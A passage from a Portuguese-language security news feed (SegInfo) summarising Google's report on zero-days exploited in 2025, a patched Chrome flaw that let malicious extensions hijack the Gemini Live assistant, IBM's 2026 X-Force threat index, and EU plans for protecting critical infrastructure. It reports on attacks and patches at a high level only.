<p class="wp-block-paragraph">O Google revelou que <strong>90 vulnerabilidades do tipo zero-day foram exploradas ativamente em 2025</strong>, e quase metade delas teve como alvo <strong>tecnologias utilizadas em ambientes corporativos</strong>. Os dados fazem parte de um relatório divulgado pelo <strong>Google Threat Intelligence Group (GTIG)</strong>, que analisa tendências globais de exploração de falhas críticas.</p>



<p class="wp-block-paragraph">Segundo a empresa, o número de zero-days observados em 2025 foi superior ao registrado em 2024, quando foram identificadas <strong>78 vulnerabilidades exploradas</strong>, mas inferior ao total de <strong>100 casos registrados em 2023</strong>.</p>



<h2 id="h-principais-fornecedores-afetados" class="wp-block-heading">Principais fornecedores afetados</h2>



<p class="wp-block-paragraph">Entre os fornecedores impactados, a <strong>Microsoft concentrou a maior parte das vulnerabilidades exploradas</strong>, com <strong>25 zero-days</strong>. Na sequência aparecem <strong>Google (11)</strong>, <strong>Apple (8)</strong> e <strong>Cisco (4)</strong>.</p>



<p class="wp-block-paragraph">Os <strong>sistemas operacionais — tanto desktop quanto mobile — continuaram sendo o principal alvo</strong>, representando <strong>44% das vulnerabilidades exploradas em 2025</strong>, um aumento em relação aos <strong>40% registrados em 2024</strong>.</p>



<h2 id="h-exploracao-em-dispositivos-moveis-cresce" class="wp-block-heading">Exploração em dispositivos móveis cresce</h2>



<p class="wp-block-paragraph">O relatório também aponta um crescimento na exploração de <strong>zero-days em dispositivos móveis</strong>. Em 2024 foram identificadas <strong>9 vulnerabilidades desse tipo</strong>, enquanto em 2025 o número subiu para <strong>15</strong>.</p>



<p class="wp-block-paragraph">De acordo com o Google, em diversos casos os atacantes <strong>encadearam três ou mais vulnerabilidades</strong> para alcançar um único objetivo, técnica comum em ataques mais complexos que buscam contornar camadas de segurança.</p>



<h2 id="h-menos-falhas-em-navegadores-mas-ataques-mais-sofisticados" class="wp-block-heading">Menos falhas em navegadores — mas ataques mais sofisticados</h2>



<p class="wp-block-paragraph">O número de <strong>zero-days relacionados a navegadores continua em queda</strong>. Embora isso possa indicar avanços na segurança dessas plataformas, também pode sugerir que <strong>os ataques estão se tornando mais sofisticados e difíceis de detectar</strong>, segundo o relatório.</p>



<h2 id="h-spyware-comercial-lidera-exploracao-de-zero-days" class="wp-block-heading">Spyware comercial lidera exploração de zero-days</h2>



<p class="wp-block-paragraph">Das <strong>90 vulnerabilidades exploradas em 2025</strong>, <strong>42 puderam ser atribuídas a algum ator de ameaça específico</strong>.</p>



<p class="wp-block-paragraph">Pela primeira vez, <strong>fornecedores comerciais de vigilância (Commercial Surveillance Vendors – CSV)</strong> lideraram o uso de zero-days. Empresas desse setor — responsáveis pelo desenvolvimento de ferramentas de spyware — exploraram <strong>15 vulnerabilidades</strong>, enquanto <strong>outras três foram classificadas como “provavelmente associadas” a esse tipo de fornecedor</strong>.</p>



<p class="wp-block-paragraph">Já <strong>grupos de ciberespionagem patrocinados por Estados</strong> foram responsáveis pela exploração de <strong>12 zero-days</strong>, com <strong>três outras vulnerabilidades possivelmente ligadas a esse tipo de operação</strong>. Uma parcela significativa desses ataques foi associada a <strong>grupos com ligação à China</strong>.</p>



<p class="wp-block-paragraph">Segundo o Google, a tendência observada ao longo da última década permanece: <strong>grupos ligados à República Popular da China continuam entre os usuários mais ativos de vulnerabilidades zero-day</strong>.</p>



<p class="wp-block-paragraph">“Grupos associados à China, como UNC5221 e UNC3886, continuam focando fortemente em dispositivos de segurança e equipamentos de borda para manter acesso persistente a alvos estratégicos”, destacou a empresa.</p>



<h2 id="h-tecnologias-corporativas-cada-vez-mais-visadas" class="wp-block-heading">Tecnologias corporativas cada vez mais visadas</h2>



<p class="wp-block-paragraph">O relatório destaca ainda que <strong>43 das vulnerabilidades exploradas em 2025 afetaram tecnologias corporativas</strong>, o que representa <strong>quase metade do total — o maior nível já registrado</strong>.</p>



<p class="wp-block-paragraph">Muitos dos ataques tiveram como alvo <strong>equipamentos de rede e dispositivos de segurança</strong>, frequentemente utilizados como <strong>porta de entrada inicial para comprometimento de ambientes corporativos</strong>.</p>



<p class="wp-block-paragraph">Segundo o Google, esse movimento evidencia o risco representado pela <strong>infraestrutura de borda confiável</strong>, como firewalls, gateways e appliances de segurança.</p>



<p class="wp-block-paragraph">“A exploração crescente de dispositivos de rede e segurança evidencia o risco crítico associado à infraestrutura de borda confiável, enquanto ataques a softwares corporativos demonstram o valor de plataformas altamente interconectadas que oferecem acesso privilegiado a redes e ativos de dados”, explica o relatório.</p>



<h2 id="h-ia-deve-influenciar-ataques-e-defesa-em-2026" class="wp-block-heading">IA deve influenciar ataques e defesa em 2026</h2>



<p class="wp-block-paragraph">O Google também projeta que <strong>a inteligência artificial terá papel cada vez mais relevante no cenário de vulnerabilidades em 2026</strong>.</p>



<p class="wp-block-paragraph">Atacantes podem utilizar IA para <strong>acelerar a descoberta de falhas e o desenvolvimento de exploits</strong>, enquanto equipes de defesa podem aplicar a tecnologia para <strong>identificar vulnerabilidades desconhecidas e neutralizá-las antes que sejam exploradas</strong>.</p>



<p class="wp-block-paragraph">Esse cenário reforça a importância de <strong>monitoramento contínuo, gestão de vulnerabilidades e estratégias de segurança proativas</strong>, especialmente em ambientes corporativos cada vez mais dependentes de infraestruturas interconectadas.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/google-half-of-2025s-90-exploited-zero-days-aimed-at-enterprises/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/06/google-quase-metade-dos-zero-days-explorados-em-2025-teve-como-alvo-empresas/">Google: quase metade dos zero-days explorados em 2025 teve como alvo empresas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74571</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Vulnerabilidade permitia sequestro do assistente de IA Gemini Live no Chrome</title>
		<link>https://seginfo.com.br/2026/03/03/vulnerabilidade-permitia-sequestro-do-assistente-de-ia-gemini-live-no-chrome/</link>
		
		
		<pubDate>Tue, 03 Mar 2026 13:13:54 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74527</guid>

					<description><![CDATA[<p>Uma vulnerabilidade no Google Chrome poderia ter permitido que extensões maliciosas sequestrassem o assistente de inteligência artificial do navegador, o Gemini Live, para espionar usuários e exfiltrar dados. A falha foi identificada pela Palo Alto Networks e corrigida em janeiro, na versão 143 do navegador. O Gemini Live é o assistente de IA integrado ao&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/03/vulnerabilidade-permitia-sequestro-do-assistente-de-ia-gemini-live-no-chrome/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/03/vulnerabilidade-permitia-sequestro-do-assistente-de-ia-gemini-live-no-chrome/">Vulnerabilidade permitia sequestro do assistente de IA Gemini Live no Chrome</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="559" src="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-1024x559.jpeg" alt="" class="wp-image-74531" style="aspect-ratio:1.8318737860769414;width:744px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-1024x559.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-300x164.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-150x82.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-768x419.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-1536x838.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-2048x1117.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-1170x638.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-1877x1024.jpeg 1877w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1898908382-880x480.jpeg 880w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Uma vulnerabilidade no Google Chrome poderia ter permitido que extensões maliciosas sequestrassem o assistente de inteligência artificial do navegador, o Gemini Live, para espionar usuários e exfiltrar dados. A falha foi identificada pela <em>Palo Alto Networks</em> e corrigida em janeiro, na versão 143 do navegador.</p>



<p class="wp-block-paragraph">O Gemini Live é o assistente de IA integrado ao painel lateral do Chrome, projetado para auxiliar usuários na navegação. Entre suas funcionalidades estão o resumo de conteúdos em tempo real, a execução automática de tarefas específicas e o apoio na compreensão contextual da página ativa.</p>



<p class="wp-block-paragraph">De acordo com a Palo Alto Networks, ao conceder à IA acesso direto e privilegiado ao ambiente de navegação, os chamados “AI browsers” passam a ser capazes de realizar operações complexas e em múltiplas etapas — algo que antes exigia diversas extensões ou ações manuais do usuário.</p>



<p class="wp-block-paragraph">Para funcionar como previsto, o assistente de IA visualiza o conteúdo exibido na tela e utiliza a página acessada como contexto para executar instruções. No entanto, esse nível ampliado de acesso também introduz novos riscos de segurança.</p>



<h3 id="h-detalhes-da-vulnerabilidade" class="wp-block-heading">Detalhes da vulnerabilidade</h3>



<p class="wp-block-paragraph">Rastreada como <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-0628" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-0628</a></strong>, a falha poderia permitir que extensões maliciosas injetassem código JavaScript diretamente no painel do Gemini Live.</p>



<p class="wp-block-paragraph">Segundo a Palo Alto Networks, a exploração exigiria que a extensão tivesse acesso a um conjunto específico de permissões por meio da API <strong>declarativeNetRequests</strong>, que permite interceptar e modificar requisições e respostas HTTPS. Esse recurso foi criado para finalidades legítimas, como bloquear solicitações maliciosas ou intrusivas, e é habilitado por padrão para permitir que extensões interajam com conteúdos originados do Gemini carregados na aba do site.</p>



<p class="wp-block-paragraph">A vulnerabilidade impactava a interação com os conteúdos carregados no painel do Gemini, possibilitando que códigos JavaScript obtivessem acesso às capacidades da IA.</p>



<p class="wp-block-paragraph">Entre essas capacidades estão a leitura de arquivos locais, captura de capturas de tela, acesso à câmera e ao microfone, além da execução de tarefas complexas. Caso explorada, a falha poderia permitir que atacantes obtivessem acesso indevido a esses recursos privilegiados.</p>



<p class="wp-block-paragraph">Como o painel do Gemini Live é um componente nativo do navegador, um invasor poderia injetar código para ativar câmera e microfone sem o consentimento do usuário, acessar arquivos locais, capturar imagens das abas abertas ou ainda sequestrar o painel para conduzir ataques de phishing.</p>



<p class="wp-block-paragraph">A Palo Alto Networks destaca que, como o aplicativo Gemini executa ações legítimas que exigem privilégios elevados, seu sequestro poderia conceder a extensões maliciosas acesso a recursos do sistema que normalmente não estariam disponíveis.</p>



<h3 id="h-correcao-e-versoes-afetadas" class="wp-block-heading">Correção e versões afetadas</h3>



<p class="wp-block-paragraph">A vulnerabilidade foi reportada ao Google em outubro. A correção foi disponibilizada nas versões <strong>Chrome 143.0.7499.192 e 143.0.7499.193 para Windows e macOS</strong>, e na versão <strong>143.0.7499.192 para Linux</strong>.</p>



<p class="wp-block-paragraph">Usuários e organizações devem garantir que seus navegadores estejam atualizados para mitigar o risco associado à <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-0628" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-0628</a>, especialmente em ambientes corporativos que fazem uso intensivo de extensões e recursos baseados em inteligência artificial.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/vulnerability-allowed-hijacking-chromes-gemini-live-ai-assistant/" target="_blank" rel="noreferrer noopener">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/03/vulnerabilidade-permitia-sequestro-do-assistente-de-ia-gemini-live-no-chrome/">Vulnerabilidade permitia sequestro do assistente de IA Gemini Live no Chrome</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74527</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>IBM alerta: ataques impulsionados por IA avançam em 2026 enquanto falhas básicas expõem empresas</title>
		<link>https://seginfo.com.br/2026/02/26/ibm-alerta-ataques-impulsionados-por-ia-avancam-em-2026-enquanto-falhas-basicas-expoem-empresas/</link>
		
		
		<pubDate>Thu, 26 Feb 2026 21:00:00 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74482</guid>

					<description><![CDATA[<p>A IBM divulgou o relatório 2026 X-Force Threat Intelligence Index, apontando um cenário de escalada nos ataques cibernéticos impulsionados pelo uso de Inteligência Artificial (IA). De acordo com o estudo, criminosos estão explorando falhas básicas de segurança em ritmo acelerado, utilizando ferramentas de IA para identificar vulnerabilidades com maior rapidez e eficiência. O IBM X-Force&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/02/26/ibm-alerta-ataques-impulsionados-por-ia-avancam-em-2026-enquanto-falhas-basicas-expoem-empresas/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/02/26/ibm-alerta-ataques-impulsionados-por-ia-avancam-em-2026-enquanto-falhas-basicas-expoem-empresas/">IBM alerta: ataques impulsionados por IA avançam em 2026 enquanto falhas básicas expõem empresas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="562" src="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-1024x562.jpeg" alt="" class="wp-image-74485" style="width:788px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-1024x562.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-300x165.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-150x82.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-768x422.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-1536x843.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-2048x1125.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-1170x642.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-1865x1024.jpeg 1865w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1887612357-874x480.jpeg 874w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A IBM divulgou o relatório <strong>2026 X-Force Threat Intelligence Index</strong>, apontando um cenário de escalada nos ataques cibernéticos impulsionados pelo uso de Inteligência Artificial (IA). De acordo com o estudo, criminosos estão explorando falhas básicas de segurança em ritmo acelerado, utilizando ferramentas de IA para identificar vulnerabilidades com maior rapidez e eficiência.</p>



<p class="wp-block-paragraph">O IBM X-Force registrou um aumento de <strong>44% nos ataques iniciados pela exploração de aplicações expostas à internet</strong>, em grande parte devido à ausência de controles adequados de autenticação e ao uso de IA na descoberta automatizada de vulnerabilidades.</p>



<h3 id="h-exploracao-de-vulnerabilidades-lidera-vetores-de-ataque" class="wp-block-heading">Exploração de vulnerabilidades lidera vetores de ataque</h3>



<p class="wp-block-paragraph">Entre os principais destaques do relatório:</p>



<ul class="wp-block-list">
<li>• <strong>Grupos ativos de ransomware e extorsão cresceram 49% em relação ao ano anterior</strong>, refletindo a fragmentação do ecossistema criminoso. O número de vítimas divulgadas publicamente também aumentou cerca de 12%.</li>



<li>• <strong>Comprometimentos relevantes de cadeias de suprimentos e terceiros quase quadruplicaram desde 2020</strong>, com atacantes explorando ambientes de desenvolvimento, pipelines de CI/CD e integrações com soluções SaaS.</li>



<li>• <strong>A exploração de vulnerabilidades tornou-se a principal causa de incidentes</strong>, representando 40% dos ataques observados pelo X-Force em 2025.**</li>
</ul>



<p class="wp-block-paragraph">Segundo Mark Hughes, Global Managing Partner de Cybersecurity Services da IBM, os criminosos não estão reinventando suas estratégias, mas acelerando-as com o uso de IA:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Os atacantes não estão reinventando seus playbooks, estão acelerando-os com IA. O problema central continua sendo o mesmo: empresas estão sobrecarregadas por vulnerabilidades de software. A diferença agora é a velocidade. Com tantas falhas que não exigem credenciais, os atacantes conseguem ir diretamente da varredura ao impacto. Líderes de segurança precisam adotar uma abordagem mais proativa, utilizando detecção e resposta a ameaças baseadas em IA para identificar lacunas antes que os ataques escalem.”</p>
</blockquote>



<h3 id="h-o-problema-crescente-de-identidade-na-era-da-ia" class="wp-block-heading">O problema crescente de identidade na era da IA</h3>



<p class="wp-block-paragraph">O relatório também chama atenção para o risco crescente envolvendo plataformas de IA. Em 2025, malwares do tipo <strong>infostealer</strong> foram responsáveis pela exposição de mais de <strong>300 mil credenciais do ChatGPT</strong>, indicando que soluções baseadas em IA já enfrentam riscos semelhantes aos de outras aplicações corporativas SaaS.</p>



<p class="wp-block-paragraph">O comprometimento de credenciais de chatbots vai além do simples acesso indevido a contas. Entre os riscos identificados estão:</p>



<ul class="wp-block-list">
<li>• Manipulação de respostas geradas por IA;</li>



<li>• Exfiltração de dados sensíveis;</li>



<li>• Inserção de prompts maliciosos para alterar comportamentos dos modelos.</li>
</ul>



<p class="wp-block-paragraph">O cenário reforça a necessidade de avaliar o uso corporativo de IA em escala organizacional, implementando <strong>autenticação forte, controle de acesso condicional e monitoramento contínuo</strong>.</p>



<h3 id="h-fragmentacao-do-ransomware-e-automacao-de-ataques" class="wp-block-heading">Fragmentação do ransomware e automação de ataques</h3>



<p class="wp-block-paragraph">O X-Force observou um aumento de 49% no número de grupos ativos de ransomware em 2025. Parte desse crescimento está associada a operadores menores e transitórios, cujas campanhas de baixo volume dificultam atribuição e resposta coordenada.</p>



<p class="wp-block-paragraph">A redução das barreiras de entrada também contribui para esse avanço: agentes maliciosos reutilizam ferramentas vazadas, adotam playbooks consolidados e utilizam IA para automatizar operações. Com a evolução dos modelos multimodais, a expectativa é que tarefas complexas — como reconhecimento avançado e ataques sofisticados de ransomware — sejam cada vez mais automatizadas, tornando as ameaças mais rápidas e adaptativas.</p>



<h3 id="h-cadeias-de-suprimentos-sob-pressao-crescente" class="wp-block-heading">Cadeias de suprimentos sob pressão crescente</h3>



<p class="wp-block-paragraph">Desde 2020, a IBM identificou um aumento de quase quatro vezes nos grandes comprometimentos de cadeias de suprimentos e terceiros. O movimento é impulsionado principalmente pela exploração de relações de confiança entre empresas, automações em pipelines de desenvolvimento e integrações SaaS.</p>



<p class="wp-block-paragraph">Além disso, ferramentas de codificação baseadas em IA vêm acelerando o desenvolvimento de software — mas também podem introduzir código não validado ou vulnerável nos ambientes corporativos. Com isso, a pressão sobre pipelines, bibliotecas open source e ecossistemas de desenvolvimento tende a crescer ainda mais em 2026.</p>



<p class="wp-block-paragraph">Outro fator relevante é o <strong>apagamento das fronteiras entre atores estatais e financeiramente motivados</strong>. Técnicas antes associadas exclusivamente a operações patrocinadas por Estados vêm sendo disseminadas em fóruns clandestinos e adotadas por grupos criminosos comuns, especialmente com o apoio da IA para reconhecimento e exploração.</p>



<p class="wp-block-paragraph">O relatório da IBM reforça uma mensagem clara: as ameaças não são necessariamente novas, mas estão mais rápidas, automatizadas e acessíveis. Em um cenário onde vulnerabilidades conhecidas continuam sendo exploradas em larga escala, a adoção de uma postura proativa, com foco em gestão de vulnerabilidades, proteção de identidade e monitoramento contínuo, torna-se fundamental para reduzir riscos e fortalecer a resiliência cibernética.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.intelligentciso.com/2026/02/25/ibm-2026-x-force-threat-index-ai-driven-attacks-are-escalating-as-basic-security-gaps-leave-enterprises-exposed/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://seginfo.com.br/2026/02/26/ibm-alerta-ataques-impulsionados-por-ia-avancam-em-2026-enquanto-falhas-basicas-expoem-empresas/">IBM alerta: ataques impulsionados por IA avançam em 2026 enquanto falhas básicas expõem empresas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74482</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>União Europeia propõe reforço na proteção de infraestruturas críticas contra ameaças cibernéticas e híbridas</title>
		<link>https://seginfo.com.br/2026/02/19/uniao-europeia-propoe-reforco-na-protecao-de-infraestruturas-criticas-contra-ameacas-ciberneticas-e-hibridas/</link>
		
		
		<pubDate>Thu, 19 Feb 2026 13:50:06 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74378</guid>

					<description><![CDATA[<p>A Comissão Europeia voltou a defender o endurecimento das regras de proteção às infraestruturas críticas do bloco, diante do avanço de ameaças cibernéticas e híbridas no continente. O tema ganhou destaque durante a Munich Cyber Security Conference, onde autoridades europeias alertaram para a necessidade de uma postura menos permissiva frente a riscos digitais estratégicos. Henna&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/02/19/uniao-europeia-propoe-reforco-na-protecao-de-infraestruturas-criticas-contra-ameacas-ciberneticas-e-hibridas/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/02/19/uniao-europeia-propoe-reforco-na-protecao-de-infraestruturas-criticas-contra-ameacas-ciberneticas-e-hibridas/">União Europeia propõe reforço na proteção de infraestruturas críticas contra ameaças cibernéticas e híbridas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="576" src="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-1024x576.jpeg" alt="" class="wp-image-74380" style="width:756px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-1024x576.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-300x169.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-768x432.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-1536x864.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-2048x1152.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-1170x658.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-1820x1024.jpeg 1820w, https://seginfo.com.br/wp-content/uploads/2026/02/AdobeStock_1292728820-853x480.jpeg 853w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Comissão Europeia voltou a defender o endurecimento das regras de proteção às infraestruturas críticas do bloco, diante do avanço de ameaças cibernéticas e híbridas no continente. O tema ganhou destaque durante a Munich Cyber Security Conference, onde autoridades europeias alertaram para a necessidade de uma postura menos permissiva frente a riscos digitais estratégicos.</p>



<p class="wp-block-paragraph">Henna Virkkunen, vice-presidente executiva da Comissão Europeia, afirmou que a União Europeia não pode mais subestimar a capacidade de atores hostis de comprometer serviços essenciais por meio de ataques digitais. Segundo ela, os conflitos contemporâneos incorporam o ciberespaço como elemento central, frequentemente combinando invasões virtuais com sabotagens físicas, campanhas de desinformação e pressões econômicas coordenadas.</p>



<h2 id="h-ciberseguranca-como-pilar-da-seguranca-europeia" class="wp-block-heading">Cibersegurança como pilar da segurança europeia</h2>



<p class="wp-block-paragraph">A representante destacou que não há segurança nacional sem cibersegurança. Nos últimos anos, hospitais, redes de energia, órgãos públicos, cadeias de suprimentos e até processos eleitorais em Estados-membros foram alvo de ataques, evidenciando a vulnerabilidade de setores estratégicos.</p>



<p class="wp-block-paragraph">O alerta ocorre em meio à proposta recente de revisão do Cybersecurity Act. A iniciativa busca ampliar o papel da agência europeia de cibersegurança (ENISA) e fortalecer mecanismos de mitigação de riscos nas cadeias de fornecimento de tecnologias da informação e comunicação consideradas críticas.</p>



<p class="wp-block-paragraph">Entre as medidas sugeridas está a retirada progressiva de fornecedores classificados como de alto risco das infraestruturas nacionais sensíveis. A intenção é reduzir a exposição a dependências tecnológicas potencialmente exploráveis em cenários de tensão geopolítica.</p>



<h2 id="h-cadeias-de-fornecimento-sob-escrutinio" class="wp-block-heading">Cadeias de fornecimento sob escrutínio</h2>



<p class="wp-block-paragraph">O debate não ocorre em um vácuo. Diversos países europeus já impuseram limitações a determinados fornecedores estrangeiros de equipamentos de telecomunicações, especialmente em componentes centrais das redes. Paralelamente, a dependência de grandes provedores tecnológicos externos também tem sido questionada, sobretudo após decisões políticas recentes fora do bloco que impactaram o acesso a serviços digitais.</p>



<p class="wp-block-paragraph">Sem citar países específicos, Virkkunen ressaltou que a digitalização acelerada ampliou significativamente a superfície de ataque da Europa. Nesse contexto, a defesa cibernética passa a integrar a estratégia mais ampla de prontidão e defesa do bloco.</p>



<h2 id="h-novas-frentes-drones-cabos-submarinos-e-industria-europeia" class="wp-block-heading">Novas frentes: drones, cabos submarinos e indústria europeia</h2>



<p class="wp-block-paragraph">A Comissão também vem estruturando planos de ação voltados à segurança de drones e à proteção de cabos submarinos — infraestruturas consideradas críticas para comunicações e operações estratégicas. Incidentes recentes reforçaram a necessidade de atenção redobrada a esses ativos.</p>



<p class="wp-block-paragraph">Para Bruxelas, o ciberespaço deve ser tratado como um domínio estratégico central, inclusive sob a ótica militar. Isso implica investimento em capacidades próprias, estímulo ao desenvolvimento de uma indústria europeia de cibersegurança e avanço em tecnologias como computação de alto desempenho e Inteligência Artificial aplicada à defesa.</p>



<p class="wp-block-paragraph">A mensagem é clara: diante da intensificação das ameaças híbridas, fortalecer a resiliência digital deixou de ser apenas uma pauta técnica e passou a ocupar posição estratégica na agenda de segurança da União Europeia.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.itsecurity.pt/news/news/ue-quer-reforcar-protecao-de-infraestruturas-contra-ameacas-ciberneticas-e-hibridas" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/02/19/uniao-europeia-propoe-reforco-na-protecao-de-infraestruturas-criticas-contra-ameacas-ciberneticas-e-hibridas/">União Europeia propõe reforço na proteção de infraestruturas críticas contra ameaças cibernéticas e híbridas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74378</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Microsoft corrige 59 vulnerabilidades, incluindo seis zero-days exploradas ativamente</title>
		<link>https://seginfo.com.br/2026/02/13/microsoft-corrige-59-vulnerabilidades-incluindo-seis-zero-days-exploradas-ativamente/</link>
		
		
		<pubDate>Fri, 13 Feb 2026 20:19:37 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74334</guid>

					<description><![CDATA[<p>A Microsoft liberou nesta terça-feira (Patch Tuesday) um pacote de atualizações de segurança para corrigir 59 vulnerabilidades em seus produtos, incluindo seis falhas classificadas como zero-day que já vinham sendo exploradas ativamente. Do total de vulnerabilidades corrigidas, cinco foram classificadas como Críticas, 52 como Importantes e duas como Moderadas. Entre as categorias mais recorrentes estão:&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/02/13/microsoft-corrige-59-vulnerabilidades-incluindo-seis-zero-days-exploradas-ativamente/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/02/13/microsoft-corrige-59-vulnerabilidades-incluindo-seis-zero-days-exploradas-ativamente/">Microsoft corrige 59 vulnerabilidades, incluindo seis zero-days exploradas ativamente</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
